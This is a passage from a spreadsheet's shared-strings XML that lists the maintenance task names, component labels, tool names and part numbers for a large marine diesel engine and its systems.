    <t>Func. test of crankc.</t>
  </si>
  <si>
    <t>Overhaul of ch. air cooler</t>
  </si>
  <si>
    <t>Clean. the turbine, dry</t>
  </si>
  <si>
    <t>Water w., comp. Side</t>
  </si>
  <si>
    <t>Exh. pipe compensator</t>
  </si>
  <si>
    <t>Water w. turbine side</t>
  </si>
  <si>
    <t>Air filter</t>
  </si>
  <si>
    <t>Electric turning gear</t>
  </si>
  <si>
    <t>Overh., test of air st.</t>
  </si>
  <si>
    <t>Emerg. starting valve</t>
  </si>
  <si>
    <t>Check of compres. air</t>
  </si>
  <si>
    <t>Fuel oil feed pump</t>
  </si>
  <si>
    <t>Adj. of max. com. pres</t>
  </si>
  <si>
    <t>Dism./mount. of inj. pump</t>
  </si>
  <si>
    <t>Dis/ass of fuel pump</t>
  </si>
  <si>
    <t>Fuel injection valve</t>
  </si>
  <si>
    <t>Fuel oil split filter</t>
  </si>
  <si>
    <t>Check of fuel oil piping</t>
  </si>
  <si>
    <t>Lubricating oil pump</t>
  </si>
  <si>
    <t>Prelubricating pump</t>
  </si>
  <si>
    <t>Lubricating oil cooler</t>
  </si>
  <si>
    <t>Lubricating oil filter</t>
  </si>
  <si>
    <t>Lub. oil, thermo. valve</t>
  </si>
  <si>
    <t>Check of lub. oil piping</t>
  </si>
  <si>
    <t>Check of c. water syst.</t>
  </si>
  <si>
    <t>Cooling water, t. valve</t>
  </si>
  <si>
    <t>HT and LT water pumps</t>
  </si>
  <si>
    <t>Check of cooling water system</t>
  </si>
  <si>
    <t>Fitting instruction</t>
  </si>
  <si>
    <t>Repl. of conicals</t>
  </si>
  <si>
    <t>Maint. of conicals</t>
  </si>
  <si>
    <t>Funct. of the hydr. tools</t>
  </si>
  <si>
    <t>Appl. of hydraulic tools</t>
  </si>
  <si>
    <t>Hand lever pump</t>
  </si>
  <si>
    <t>Maint. of hyd. tool</t>
  </si>
  <si>
    <t>Tigh. w. torque spanner</t>
  </si>
  <si>
    <t>Tool comb. con. rod s.</t>
  </si>
  <si>
    <t>Max. pres. Indicator</t>
  </si>
  <si>
    <t>Kit for cylinder unit</t>
  </si>
  <si>
    <t>Valve spindles and v. g.</t>
  </si>
  <si>
    <t>Safety and indicator valve</t>
  </si>
  <si>
    <t>Cyl. head, top cover</t>
  </si>
  <si>
    <t>Cylinder unit</t>
  </si>
  <si>
    <t>Piston and connecting rod</t>
  </si>
  <si>
    <t>Cylinder liner</t>
  </si>
  <si>
    <t>Intermediate wheel</t>
  </si>
  <si>
    <t>Camshaft</t>
  </si>
  <si>
    <t>Rol. guide and push rods</t>
  </si>
  <si>
    <t>Governor and gov. drive</t>
  </si>
  <si>
    <t>Regulating device</t>
  </si>
  <si>
    <t>Overspeed device</t>
  </si>
  <si>
    <t>Instruments</t>
  </si>
  <si>
    <t>Pick-up</t>
  </si>
  <si>
    <t>Level switch in oil sump</t>
  </si>
  <si>
    <t>Fuel oil leakage alarm</t>
  </si>
  <si>
    <t>Monitoring box</t>
  </si>
  <si>
    <t>Output module</t>
  </si>
  <si>
    <t>APM motor control</t>
  </si>
  <si>
    <t>Valve control box</t>
  </si>
  <si>
    <t>Crankshaft</t>
  </si>
  <si>
    <t>Redsilient gear wheel</t>
  </si>
  <si>
    <t>Flywheel with gear rim</t>
  </si>
  <si>
    <t>Cover with pumps</t>
  </si>
  <si>
    <t>Front-end box</t>
  </si>
  <si>
    <t>Cover on frame</t>
  </si>
  <si>
    <t>Base frame</t>
  </si>
  <si>
    <t>Charging air cooler</t>
  </si>
  <si>
    <t>Exh. pipe arrangement</t>
  </si>
  <si>
    <t>Mounting of turbocharger</t>
  </si>
  <si>
    <t>Water w. comp.</t>
  </si>
  <si>
    <t>Connecting pipe</t>
  </si>
  <si>
    <t>DRAIN TRAP</t>
  </si>
  <si>
    <t>Blowgun for dry clean. t.c.</t>
  </si>
  <si>
    <t>Charge air pipes</t>
  </si>
  <si>
    <t>Lub. Oil pipes t.c.</t>
  </si>
  <si>
    <t>Air starter</t>
  </si>
  <si>
    <t>Main starting valve</t>
  </si>
  <si>
    <t>Muffler</t>
  </si>
  <si>
    <t>Starting valve</t>
  </si>
  <si>
    <t>Main stop valve</t>
  </si>
  <si>
    <t>Air strainer</t>
  </si>
  <si>
    <t>Safety valve</t>
  </si>
  <si>
    <t>On-Off valve for jet system</t>
  </si>
  <si>
    <t>Pres. reduction valve</t>
  </si>
  <si>
    <t>Turning gear with attach.</t>
  </si>
  <si>
    <t>Overspeed stop valve</t>
  </si>
  <si>
    <t>Arr. of jet syst.</t>
  </si>
  <si>
    <t>Starting air receiver</t>
  </si>
  <si>
    <t>Fuel injection pump</t>
  </si>
  <si>
    <t>Fuel oil filter duples</t>
  </si>
  <si>
    <t>Fuel injection pipe</t>
  </si>
  <si>
    <t>Safety filter</t>
  </si>
  <si>
    <t>Fuel oil arrangement</t>
  </si>
  <si>
    <t>Fuel pump connect.</t>
  </si>
  <si>
    <t>Nozzle cooling pump</t>
  </si>
  <si>
    <t>MDO pump unit</t>
  </si>
  <si>
    <t>MDO emergency pump</t>
  </si>
  <si>
    <t>Pressure reduction Valve</t>
  </si>
  <si>
    <t>Solenoid valve 2/2</t>
  </si>
  <si>
    <t>Hand wing pump</t>
  </si>
  <si>
    <t>Arr. of lub. oil separator</t>
  </si>
  <si>
    <t>Arr. of crankcase venting</t>
  </si>
  <si>
    <t>Prelub. pump arr.</t>
  </si>
  <si>
    <t>Fresh water pumps</t>
  </si>
  <si>
    <t>Pipes on cyl. Head</t>
  </si>
  <si>
    <t>Cooling water pipes/connections</t>
  </si>
  <si>
    <t>Preheater unit</t>
  </si>
  <si>
    <t>Flexible external con.</t>
  </si>
  <si>
    <t>Conical element</t>
  </si>
  <si>
    <t>St. tools for normal maint.</t>
  </si>
  <si>
    <t>Tools for reconditioning</t>
  </si>
  <si>
    <t>Tools for cylinder head</t>
  </si>
  <si>
    <t>Tools for piston</t>
  </si>
  <si>
    <t>Tools for camshaft</t>
  </si>
  <si>
    <t>Tools for operating gear</t>
  </si>
  <si>
    <t>Tools control and safety</t>
  </si>
  <si>
    <t>Tools for crankshaft</t>
  </si>
  <si>
    <t>Tools for charge air cooler</t>
  </si>
  <si>
    <t>Tools for fuel oil system</t>
  </si>
  <si>
    <t>Tools for lub. oil cooler</t>
  </si>
  <si>
    <t>Hydraulic tools</t>
  </si>
  <si>
    <t>Tools for low overh. H.</t>
  </si>
  <si>
    <t>Main data</t>
  </si>
  <si>
    <t>General safety precautions</t>
  </si>
  <si>
    <t>Cap. at MCR - HFO operation</t>
  </si>
  <si>
    <t>Maint. HFO, major overhaul/insp.</t>
  </si>
  <si>
    <t>Maint. HFO, duties during ope.</t>
  </si>
  <si>
    <t>Operating data and set point</t>
  </si>
  <si>
    <t>Operation</t>
  </si>
  <si>
    <t>Checks during out-of-service</t>
  </si>
  <si>
    <t>Eng. performance and condition</t>
  </si>
  <si>
    <t>Condensate</t>
  </si>
  <si>
    <t>Borescope insp. of cyl. liner</t>
  </si>
  <si>
    <t>Disturbances during operation</t>
  </si>
  <si>
    <t>Faults in cooling water system</t>
  </si>
  <si>
    <t>Faults in lubricating oil system</t>
  </si>
  <si>
    <t>Main bearings</t>
  </si>
  <si>
    <t>Crankshaft and main bearing</t>
  </si>
  <si>
    <t>Sleeve spring vibration damper</t>
  </si>
  <si>
    <t>Piston, con. rod and cyl. liner</t>
  </si>
  <si>
    <t>Turb., charge air cooler</t>
  </si>
  <si>
    <t>Fuel oil system</t>
  </si>
  <si>
    <t>Fuel oil system - MDO</t>
  </si>
  <si>
    <t>Fuel oil system - HFO</t>
  </si>
  <si>
    <t>Fuel injection system</t>
  </si>
  <si>
    <t>Starting air system</t>
  </si>
  <si>
    <t>Lubricating oil system</t>
  </si>
  <si>
    <t>Lub. oil filter - back-flushing</t>
  </si>
  <si>
    <t>Cooling water system</t>
  </si>
  <si>
    <t>Local monit., control and safety</t>
  </si>
  <si>
    <t>Sensors used on the engine</t>
  </si>
  <si>
    <t>Dism. and mount. of bearing</t>
  </si>
  <si>
    <t>Functional test of relief valve</t>
  </si>
  <si>
    <t>Recording of engine perf. date</t>
  </si>
  <si>
    <t>Rec. of crankshaft deflection</t>
  </si>
  <si>
    <t>Check of cam. and cam. drive</t>
  </si>
  <si>
    <t>Insp. and repl. of cam. bearings</t>
  </si>
  <si>
    <t>Set. of cam. for v. and inj. ti.</t>
  </si>
  <si>
    <t>Insp. of cam fol. and roc. arms</t>
  </si>
  <si>
    <t>Dism. of cyl. unit from engine</t>
  </si>
  <si>
    <t>Disassembly of cylinder unit</t>
  </si>
  <si>
    <t>Dism. of piston and cyl. liner</t>
  </si>
  <si>
    <t>Insp. of inlet and exh. valve</t>
  </si>
  <si>
    <t>Grin. of v. s. r. and v. s. seat</t>
  </si>
  <si>
    <t>Replacement of valve guide</t>
  </si>
  <si>
    <t>Repl. of valve seat ring</t>
  </si>
  <si>
    <t>Inspection of piston</t>
  </si>
  <si>
    <t>Rem. of m. head from eng.</t>
  </si>
  <si>
    <t>Insp. of con. rod big-end b.</t>
  </si>
  <si>
    <t>Insp. and h. of cyl. liner</t>
  </si>
  <si>
    <t>Grinding of seal faces</t>
  </si>
  <si>
    <t>Assembly of cylinder unit</t>
  </si>
  <si>
    <t>Mounting of cyl. unit in eng.</t>
  </si>
  <si>
    <t>Inspection of valve rotators</t>
  </si>
  <si>
    <t>Check and adj. of valve clear.</t>
  </si>
  <si>
    <t>Check and overhaul of ind. v.</t>
  </si>
  <si>
    <t>Check of saf. v. opening pres.</t>
  </si>
  <si>
    <t>Cleaning of charge air cooler</t>
  </si>
  <si>
    <t>Clean. of turbine, dry-clean.</t>
  </si>
  <si>
    <t>Dism./instal. of f. injec. pump</t>
  </si>
  <si>
    <t>Dis./re. and re. of f. inj. Pump</t>
  </si>
  <si>
    <t>Overhaul of fuel valve</t>
  </si>
  <si>
    <t>Overhaul of lubricating oil pump</t>
  </si>
  <si>
    <t>Dis. and overh. of back-f. filt.</t>
  </si>
  <si>
    <t>Overh. of lub. oil thermo. valve</t>
  </si>
  <si>
    <t>Overhaul of lub. oil cooler</t>
  </si>
  <si>
    <t>Cooling water thermo. valves</t>
  </si>
  <si>
    <t>Overh. and repl. of c. w. pumps</t>
  </si>
  <si>
    <t>Adj. and test of pres. contr.</t>
  </si>
  <si>
    <t>Adj. and test of pres. trans.</t>
  </si>
  <si>
    <t>Adj. and test of temp. sensor</t>
  </si>
  <si>
    <t>Adj. and test of t. s. (NiCrNi)</t>
  </si>
  <si>
    <t>Adj. and test of level sensors</t>
  </si>
  <si>
    <t>Adj. and test of displ. transm.</t>
  </si>
  <si>
    <t>Frame with bearings</t>
  </si>
  <si>
    <t>Covers on frame</t>
  </si>
  <si>
    <t>Covers on front end</t>
  </si>
  <si>
    <t>Covers on aft end</t>
  </si>
  <si>
    <t>Power take off</t>
  </si>
  <si>
    <t>Vibration damper arrangement</t>
  </si>
  <si>
    <t>Flywheel</t>
  </si>
  <si>
    <t>Clutch</t>
  </si>
  <si>
    <t>Turning gear</t>
  </si>
  <si>
    <t>Drive</t>
  </si>
  <si>
    <t>Rol. g. for valves and inj. pump</t>
  </si>
  <si>
    <t>Pist. with rings and piston pin</t>
  </si>
  <si>
    <t>Valve guard</t>
  </si>
  <si>
    <t>Turbocharger</t>
  </si>
  <si>
    <t>Charge air cooler</t>
  </si>
  <si>
    <t>Charge air receiver</t>
  </si>
  <si>
    <t>Charge air connection</t>
  </si>
  <si>
    <t>Exhaust pipe arrangement</t>
  </si>
  <si>
    <t>Turb. turbine cleaning - HFO</t>
  </si>
  <si>
    <t>Exhaust outlet</t>
  </si>
  <si>
    <t>Exhaust compensator</t>
  </si>
  <si>
    <t>Fuel oil filter</t>
  </si>
  <si>
    <t>Fuel oil pipes</t>
  </si>
  <si>
    <t>Thermometer kit</t>
  </si>
  <si>
    <t>Governor and governor drive</t>
  </si>
  <si>
    <t>Speed control system</t>
  </si>
  <si>
    <t>Starting air slide valve</t>
  </si>
  <si>
    <t>Starting air distrib.</t>
  </si>
  <si>
    <t>Starting air pipes</t>
  </si>
  <si>
    <t>Air starter motor</t>
  </si>
  <si>
    <t>Starting air rec. and manometer</t>
  </si>
  <si>
    <t>Lub oil pump</t>
  </si>
  <si>
    <t>Pressure regulator</t>
  </si>
  <si>
    <t>Lub oil full flow filter</t>
  </si>
  <si>
    <t>Lub oil cooler</t>
  </si>
  <si>
    <t>Lub oil thermostatic valve</t>
  </si>
  <si>
    <t>Lub oil pipes</t>
  </si>
  <si>
    <t>Lubrication oil seperator</t>
  </si>
  <si>
    <t>Lub oil filter - external piping</t>
  </si>
  <si>
    <t>HT pump</t>
  </si>
  <si>
    <t>Cooling water thermostats</t>
  </si>
  <si>
    <t>HT cooler</t>
  </si>
  <si>
    <t>HT/LT &amp; Mixe HT/LT piping</t>
  </si>
  <si>
    <t>LT pump</t>
  </si>
  <si>
    <t>Sea water pipe</t>
  </si>
  <si>
    <t>Instrument panel</t>
  </si>
  <si>
    <t>Local control equipment</t>
  </si>
  <si>
    <t>Pressure sensors</t>
  </si>
  <si>
    <t>Temperature sensors</t>
  </si>
  <si>
    <t>Level sensors</t>
  </si>
  <si>
    <t>Exhaust temperature sensor</t>
  </si>
  <si>
    <t>Tacho &amp; proximity sensors</t>
  </si>
  <si>
    <t>Standard tools</t>
  </si>
  <si>
    <t>Tools for cylinder cover</t>
  </si>
  <si>
    <t>Tools for piston and con. rod</t>
  </si>
  <si>
    <t>Tools for cylinder liner</t>
  </si>
  <si>
    <t>Tools for fuel v. and fuel pump</t>
  </si>
  <si>
    <t>Tools for main bearing</t>
  </si>
  <si>
    <t>Tools for Maihak indicator</t>
  </si>
  <si>
    <t>Control instruments</t>
  </si>
  <si>
    <t>Mounting device for oil cooler</t>
  </si>
  <si>
    <t>Lifting device f. lub oil filter</t>
  </si>
  <si>
    <t>Lifting tool for charge air cool</t>
  </si>
  <si>
    <t>Lever for cooling water con.</t>
  </si>
  <si>
    <t>Fork for intermediate piece</t>
  </si>
  <si>
    <t>Dry clean. dev. - turb. cleaning</t>
  </si>
  <si>
    <t>Tools for connecting rod</t>
  </si>
  <si>
    <t>Closing device for turb.</t>
  </si>
  <si>
    <t>NETWORK</t>
  </si>
  <si>
    <t>CYLINDER CONTROL</t>
  </si>
  <si>
    <t>TACHO  SYSTEM</t>
  </si>
  <si>
    <t>TEST INFONO</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SECTIONAL VIEW-K90GF</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>COCOS, EDS</t>
  </si>
  <si>
    <t>5193729-6.2</t>
  </si>
  <si>
    <t>ENGINE ROOM, SPACE REGUIREMENT</t>
  </si>
  <si>
    <t>ENGINE ROOM, ENGINE ROOM CRANE</t>
  </si>
  <si>
    <t>STUDS, METAL END</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN WHEEL FRAME</t>
  </si>
  <si>
    <t>5678407-2.0</t>
  </si>
  <si>
    <t>1072-1200-0017.0</t>
  </si>
  <si>
    <t>MARKING OF CHAIN</t>
  </si>
  <si>
    <t>0474283-2.1</t>
  </si>
  <si>
    <t>Scavenging air cooler frame</t>
  </si>
  <si>
    <t>5680634-4.0</t>
  </si>
  <si>
    <t>FLANGE RECTANGLE</t>
  </si>
  <si>
    <t>5600253-4.0</t>
  </si>
  <si>
    <t>STEEL PIPES, W. CERT.</t>
  </si>
  <si>
    <t>EN850B00771638</t>
  </si>
  <si>
    <t>PAD EYES, SYMMETRICAL</t>
  </si>
  <si>
    <t>EN69WA0018</t>
  </si>
  <si>
    <t>COVER W. HANDLE, CIRCULAR</t>
  </si>
  <si>
    <t>5205903-2.1</t>
  </si>
  <si>
    <t>SPACER TUBULARS, SCR18N8</t>
  </si>
  <si>
    <t>EN150BF00100042</t>
  </si>
  <si>
    <t>HEX. HEAD SCREW, A2-80</t>
  </si>
  <si>
    <t>EN61DY1260</t>
  </si>
  <si>
    <t>EN850JA00420720</t>
  </si>
  <si>
    <t>5680838-2.0</t>
  </si>
  <si>
    <t>STAINLESS PIPES</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>PACKING-SILICONE PASTE AD</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>TAP.DOWELS,FIX.TAPER LGTH</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>Scav. air reciever, Floor plate</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN14AP0.310</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>STARTER CABINET</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5338474-9.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ACCESSORIES</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5351828-1.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>FUSE AUTOMATIC</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>0979912-0.2</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CABLE CONDUIT, HALOGENFRE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>EN710BC60603000</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF GUIDE BARS</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5680572-0.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ARR. OF SHAFT SEALING</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5508155-6.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>ARRANGEMENT OF EXH. GAS OUTLET PIPE</t>
  </si>
  <si>
    <t>EXH. GAS OUT PIPE</t>
  </si>
  <si>
    <t>PIPE REDUCER</t>
  </si>
  <si>
    <t>EXH.GAS OUT EXPANION JOINT</t>
  </si>
  <si>
    <t>COMPANION FLANGE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>SEATING, AIR COOLER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5237456-2.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5677596-9.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5472-0620 S.A.R, Safety V</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CHAIN DRIVE, OIL PIPING</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5684103-4.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>FLANGE, OVAL EDGED</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5678566-4.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>DISC, SPECIAL</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5640589-5.1</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>PIPE, STRAIGHT, ROLLED</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5672496-0.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>AIR COOLER, ELEMENT</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5248976-0.2</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5472-0100 Scavenge Air Co</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5472-0100-0003.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>COATING INSTRUTION</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>1231510-7.3</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5472-0200 Water Mist Catc</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5472-0200-0002.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>LUB.OIL PIPES</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5678954-6.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>AUXILLARY CHAIN DRIVE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>5683390-2.0</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>CHAINW.FRAME W.COVERS</t>
  </si>
  <si>
    <t>010</t>
  </si>
  <si>
    <t>002</t>
  </si>
  <si>
    <t>MAIN STARTING AIR, VARIOUS PIPES</t>
  </si>
  <si>
    <t>ARR. OF MAIN START.VALVE</t>
  </si>
  <si>
    <t>5672286-3.0</t>
  </si>
  <si>
    <t>5151016-2.1</t>
  </si>
  <si>
    <t>REPAIR KIT, MAIN STARTING</t>
  </si>
  <si>
    <t>DOWEL PIN, W. SPLIT HOLES</t>
  </si>
  <si>
    <t>1226397-9.1</t>
  </si>
  <si>
    <t>PIPE BENDS, SHORT, X DEG.</t>
  </si>
  <si>
    <t>EN160G0141090</t>
  </si>
  <si>
    <t>PIPE BENDS, X DEG. W.CERT</t>
  </si>
  <si>
    <t>EN160E0141025</t>
  </si>
  <si>
    <t>FLANGE, CIRCULAR WITH NEC</t>
  </si>
  <si>
    <t>5035214-8.0</t>
  </si>
  <si>
    <t>EN-STD. KIT (SCREW-NUT-PA</t>
  </si>
  <si>
    <t>5113591-6.0</t>
  </si>
  <si>
    <t>5685694-5.0</t>
  </si>
  <si>
    <t>H-PROFILES</t>
  </si>
  <si>
    <t>5668412-6.0</t>
  </si>
  <si>
    <t>EN141RB1</t>
  </si>
  <si>
    <t>EN141P1</t>
  </si>
  <si>
    <t>SCREW, HEX. SOCKET HEAD</t>
  </si>
  <si>
    <t>ARR. OF LOAD TRANSMITTER</t>
  </si>
  <si>
    <t>5685875-5.0</t>
  </si>
  <si>
    <t>COUPLINGS F.MANOMETER,M/F</t>
  </si>
  <si>
    <t>EN9AE6.2</t>
  </si>
  <si>
    <t>ADJUSTABLE L-COUPLINGS</t>
  </si>
  <si>
    <t>EN9X16.1</t>
  </si>
  <si>
    <t>AIR RECIEVERS</t>
  </si>
  <si>
    <t>5667072-8.0</t>
  </si>
  <si>
    <t>3472-0150 S.A.S., Air Rec</t>
  </si>
  <si>
    <t>3472-0150-0003.0</t>
  </si>
  <si>
    <t>GUSSET PLATE F.LADDER</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>STANCHION W. BASE, COMPLE</t>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <t>FRAME BOX, FORE, MACHININ</t>
  </si>
  <si>
    <t>5664352-8.0</t>
  </si>
  <si>
    <t>SIDE WALL, WELDED</t>
  </si>
  <si>
    <t>5664366-1.0</t>
  </si>
  <si>
    <t>5665141-3.0</t>
  </si>
  <si>
    <t>METAL CHANNELS</t>
  </si>
  <si>
    <t>5687994-0.0</t>
  </si>
  <si>
    <t>STARTING AIR DISTRIBUTOR, PIPES</t>
  </si>
  <si>
    <t>5689285-7.0</t>
  </si>
  <si>
    <t>BLOCK CLAMPS, HEAVY DUTY</t>
  </si>
  <si>
    <t>BALL VALVE, FLANGE CONNEC</t>
  </si>
  <si>
    <t>5302903-1.1</t>
  </si>
  <si>
    <t>5319356-1.0</t>
  </si>
  <si>
    <t>5684164-4.0</t>
  </si>
  <si>
    <t>5687574-6.0</t>
  </si>
  <si>
    <t>PLATFORM ARR. TOP</t>
  </si>
  <si>
    <t>BASE FOR STANCHIONS.</t>
  </si>
  <si>
    <t>EN141N1</t>
  </si>
  <si>
    <t>EN843AD13090670</t>
  </si>
  <si>
    <t>PLATFORM ARR., UPP. MAN.</t>
  </si>
  <si>
    <t>5688618-5.0</t>
  </si>
  <si>
    <t>PLATFORM ARR., UPP. EXH.</t>
  </si>
  <si>
    <t>5686896-4.0</t>
  </si>
  <si>
    <t>Spare fuses for ALCU</t>
  </si>
  <si>
    <t>0937241-6.1</t>
  </si>
  <si>
    <t>QUICK COUPLING MALE</t>
  </si>
  <si>
    <t>1175001-5.3</t>
  </si>
  <si>
    <t>DISC ROUND PLAIN</t>
  </si>
  <si>
    <t>0409363-2.4</t>
  </si>
  <si>
    <t>2270-0250 Cyl. Cover Lift</t>
  </si>
  <si>
    <t>2270-0350-0001.0</t>
  </si>
  <si>
    <t>TS LIFTING TOOL, CYLINDER</t>
  </si>
  <si>
    <t>5197572-2.1</t>
  </si>
  <si>
    <t>TS LIFTING TOOL, PISTON R</t>
  </si>
  <si>
    <t>5197577-1.2</t>
  </si>
  <si>
    <t>TS LIFTING PISTON</t>
  </si>
  <si>
    <t>5197583-0.1</t>
  </si>
  <si>
    <t>PISTON and PISTON ROD PAN</t>
  </si>
  <si>
    <t>P90251-0298.0</t>
  </si>
  <si>
    <t>SIGN</t>
  </si>
  <si>
    <t>5637902-1.2</t>
  </si>
  <si>
    <t>LIFTING EYE NUTS</t>
  </si>
  <si>
    <t>EN69V24</t>
  </si>
  <si>
    <t>TEMPLATE, PISTON TOP</t>
  </si>
  <si>
    <t>5204951-6.0</t>
  </si>
  <si>
    <t>SCREW-ON HAND.</t>
  </si>
  <si>
    <t>EN139C30</t>
  </si>
  <si>
    <t>STRAIGHTWAY V</t>
  </si>
  <si>
    <t>EN204A21</t>
  </si>
  <si>
    <t>2270-0470 Piston Support</t>
  </si>
  <si>
    <t>2270-0470-0010.0</t>
  </si>
  <si>
    <t>PISTON and ROD,SUPPORT TO</t>
  </si>
  <si>
    <t>P90265-0013.0</t>
  </si>
  <si>
    <t>2270-0640 Cyl Line Liftin</t>
  </si>
  <si>
    <t>2270-0640-0004.0</t>
  </si>
  <si>
    <t>WAVE CUT MACHINE FOR CYL.</t>
  </si>
  <si>
    <t>5032757-2.4</t>
  </si>
  <si>
    <t>2270-0630 Cyl. Liner Honi</t>
  </si>
  <si>
    <t>2270-0630-0001.0</t>
  </si>
  <si>
    <t>4570-0540-0002.0</t>
  </si>
  <si>
    <t>INLAY FOAM</t>
  </si>
  <si>
    <t>5280826-1.1</t>
  </si>
  <si>
    <t>HOSE WITH 2 UNIONS</t>
  </si>
  <si>
    <t>3400610-6.3</t>
  </si>
  <si>
    <t>WRENCH,SPECIAL</t>
  </si>
  <si>
    <t>3400614-3.2</t>
  </si>
  <si>
    <t>LIFTING TOOL FOR CYLINDER</t>
  </si>
  <si>
    <t>5207976-1.3</t>
  </si>
  <si>
    <t>FIXTURE FOR TENSION TEST</t>
  </si>
  <si>
    <t>5285886-2.1</t>
  </si>
  <si>
    <t>INSTR. TENSILE FIXTURE, L</t>
  </si>
  <si>
    <t>5222960-9.0</t>
  </si>
  <si>
    <t>ANCHOR SHACKLES W.SCREW P</t>
  </si>
  <si>
    <t>EN518KA0042</t>
  </si>
  <si>
    <t>VALVE SEAT SPINDLE GRIND, OPTION</t>
  </si>
  <si>
    <t>5184270-5.2</t>
  </si>
  <si>
    <t>2270-0210 Exh. Valve Grin</t>
  </si>
  <si>
    <t>2270-0210-0003.0</t>
  </si>
  <si>
    <t>WORKTABLE; EXH. VALVE, OPTION</t>
  </si>
  <si>
    <t>5184832-6.1</t>
  </si>
  <si>
    <t>2270-0220 EXH. VALVE EXTR</t>
  </si>
  <si>
    <t>2270-0220-0001.0</t>
  </si>
  <si>
    <t>CRANKSHAFT, THRUST BEAR., TOOLS</t>
  </si>
  <si>
    <t>5199599-7.4</t>
  </si>
  <si>
    <t>TS LIFT. TOOL, MAIN BEARI</t>
  </si>
  <si>
    <t>5197700-5.1</t>
  </si>
  <si>
    <t>TS PULLEY FOR WIRE, MB CA</t>
  </si>
  <si>
    <t>5197704-2.1</t>
  </si>
  <si>
    <t>TS LIFT.ATTCH.JOURNALBEAR</t>
  </si>
  <si>
    <t>5197699-3.2</t>
  </si>
  <si>
    <t>1226537-1.1</t>
  </si>
  <si>
    <t>DOWEL PIN, SPECIAL</t>
  </si>
  <si>
    <t>2570-0420 Main Bearing Sh</t>
  </si>
  <si>
    <t>2570-0420-0002.2</t>
  </si>
  <si>
    <t>SCREW SPECIAL, CHEESE HEA</t>
  </si>
  <si>
    <t>5191759-6.0</t>
  </si>
  <si>
    <t>2570-0430 MAIN BEARING ME</t>
  </si>
  <si>
    <t>2570-0430-0004.0</t>
  </si>
  <si>
    <t>CONTROL GEAR, TOOLS</t>
  </si>
  <si>
    <t>5209959-3.0</t>
  </si>
  <si>
    <t>FACE IMPACT WRENCH.FU.CAM</t>
  </si>
  <si>
    <t>1750611-0.3</t>
  </si>
  <si>
    <t>1070-1020 Crankshaft Pin</t>
  </si>
  <si>
    <t>1070-1020-0001.0</t>
  </si>
  <si>
    <t>TS LIFT.TOOL, FUEL PUMP</t>
  </si>
  <si>
    <t>5197712-5.1</t>
  </si>
  <si>
    <t>TS LIFT. TOOL, FUEL PUMP</t>
  </si>
  <si>
    <t>5197711-3.1</t>
  </si>
  <si>
    <t>PIPE-STRAIGHT, W. THREAD</t>
  </si>
  <si>
    <t>3134023-6.1</t>
  </si>
  <si>
    <t>3134715-1.1</t>
  </si>
  <si>
    <t>STEEL P.STRAIGHT W.HOLES</t>
  </si>
  <si>
    <t>4270-0230 FUEL V. INSPECT</t>
  </si>
  <si>
    <t>4270-0230-0001.0</t>
  </si>
